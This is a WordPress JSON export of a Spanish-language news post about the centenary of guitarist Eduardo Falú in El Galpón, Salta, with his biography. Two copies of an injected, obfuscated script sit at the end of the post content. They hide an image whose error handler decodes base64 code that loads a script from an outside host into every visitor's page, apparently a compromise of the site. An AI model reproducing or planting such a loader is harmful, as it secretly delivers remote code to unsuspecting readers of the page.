{"id":2763,"date":"2023-06-22T09:47:52","date_gmt":"2023-06-22T12:47:52","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2763"},"modified":"2025-08-14T00:14:30","modified_gmt":"2025-08-14T03:14:30","slug":"el-centenario-de-eduardo-yamil-falu-ya-se-palpita-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2763","title":{"rendered":"El centenario de Eduardo Yamil Fal\u00fa ya se palpita en Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a8022c\"><em>El Galp\u00f3n se prepara para homenajear en julio al escritor y compositor que vio nacer.<\/em><\/h3>\n\n\n\n<p>El 7 de julio de 2023 se cumplir\u00e1 el centenario del natalicio de Eduardo Yamil Fal\u00fa y El Galp\u00f3n ser\u00e1 el lugar elegido para recordar y rememorar a quien con su m\u00fasica y canciones, supo posicionar nuestra provincia y pa\u00eds en el mundo.<\/p>\n\n\n\n<p>Amigos del Arte y la Cultura de Salta \u201cJuan Jos\u00e9 Botelli\u201d invitan a los festejos y celebraciones que se realizar\u00e1n en la plaza central Jos\u00e9 Ignacio Gorrito, ubicada en el municipio El Galp\u00f3n, el viernes 7 de julio a partir de las 19 horas.<\/p>\n\n\n\n<p><strong>Sobre Eduardo Fal\u00fa<\/strong><\/p>\n\n\n\n<p>Nacido en El Galp\u00f3n, provincia de Salta, el 7 de julio de 1923, fue un guitarrista y compositor argentino de reconocida trayectoria internacional.<\/p>\n\n\n\n<p>Desde muy joven vivi\u00f3 en Met\u00e1n, donde su padre ten\u00eda un negocio de ramos generales. Sus progenitores, Juan y Fada Fal\u00fa, eran inmigrantes sirios. Comenz\u00f3 a tocar guitarra en forma autodidacta a los once a\u00f1os de edad, y en 1937 se radic\u00f3 en la ciudad de Salta donde realiz\u00f3 sus estudios.<\/p>\n\n\n\n<p>Compuso piezas folcl\u00f3ricas de inestimable valor, tanto desde el punto de vista musical como desde el est\u00e9tico, sobre letras de grandes poetas como Jaime D\u00e1valos, tales como \u00abZamba de la Candelaria\u00bb, \u00abLas Golondrinas\u00bb, \u00abTrago de sombra\u00bb, \u00abTonada del viejo amor\u00bb, \u00abLa Caspi Corral\u00bb, \u00abRenacer\u00bb, \u00abAmor, se llama amor\u00bb, \u00abMilonga del alucinado\u00bb, entre sus m\u00e1s conocidas; as\u00ed como con Manuel J. Castilla, (\u00abMinero Potosino\u00bb, \u00abCelos del viento\u00bb, \u00abPuna Sola\u00bb); Osiris Rodr\u00edguez Castillos, Le\u00f3n Benar\u00f3s, Hamlet Lima Quintana y Marta Mendicute. Tambi\u00e9n compuso otras de car\u00e1cter \u00e9pico como el Romance de la Muerte de Juan Lavalle, en colaboraci\u00f3n con el escritor Ernesto Sabato o Jos\u00e9 Hern\u00e1ndez, sobre textos de Jorge Luis Borges. Tambi\u00e9n colabor\u00f3 con la m\u00fasica folcl\u00f3rica usando plenamente su guitarra, as\u00ed tiene obras como: \u00abChoro del caminante\u00bb, \u00abCamino a Sucre\u00bb y \u00abTr\u00e9molo\u00bb, entre otras. Recopil\u00f3 e hizo famosa con su arreglo para guitarra, la zamba tradicional \u00abLa cuartelera\u00bb, nacida en el siglo XIX en los campos de batalla argentinos.<\/p>\n\n\n\n<p>En la Suite Argentina muestra su conocimiento de m\u00fasica acad\u00e9mica volcado a los ritmos folcl\u00f3ricos, y su alto nivel de int\u00e9rprete en guitarra, ejecutando esta obra conjuntamente con la Camerata Bariloche, dirigida por El\u00edas Khayat.<\/p>\n\n\n\n<p>Fue Premio Konex de Platino 1985 como Instrumentista de Folklore.3 En 2015 recibi\u00f3 con car\u00e1cter p\u00f3stumo un nuevo Premio Konex, el Diploma al M\u00e9rito en la disciplina Instrumentista.<\/p>\n\n\n\n<p>Como un homenaje en vida a Eduardo Fal\u00fa fue inaugurado el 16 de abril de 2011 en el 429.\u00ba aniversario de la fundaci\u00f3n de la ciudad de Salta un anfiteatro en su honor.<\/p>\n\n\n\n<p>Falleci\u00f3 el 9 de agosto de 2013 en Buenos Aires a la edad de 90 a\u00f1os.2 Sus restos descansan en el Pante\u00f3n de la Sociedad Argentina de Autores y Compositores en el Cementerio de la Chacarita.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-centenario-de-eduardo-yamil-falu-ya-se-palpita-en-salta-90264\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Galp\u00f3n se prepara para homenajear en julio al escritor y compositor que vio nacer. El 7 de julio de 2023 se cumplir\u00e1 el centenario del natalicio de Eduardo Yamil Fal\u00fa y El Galp\u00f3n ser\u00e1 el lugar elegido para recordar y rememorar a quien con su m\u00fasica y canciones, supo posicionar nuestra provincia y pa\u00eds [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2764,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2763","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2763"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2763"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2763\/revisions"}],"predecessor-version":[{"id":7050,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2763\/revisions\/7050"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2764"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}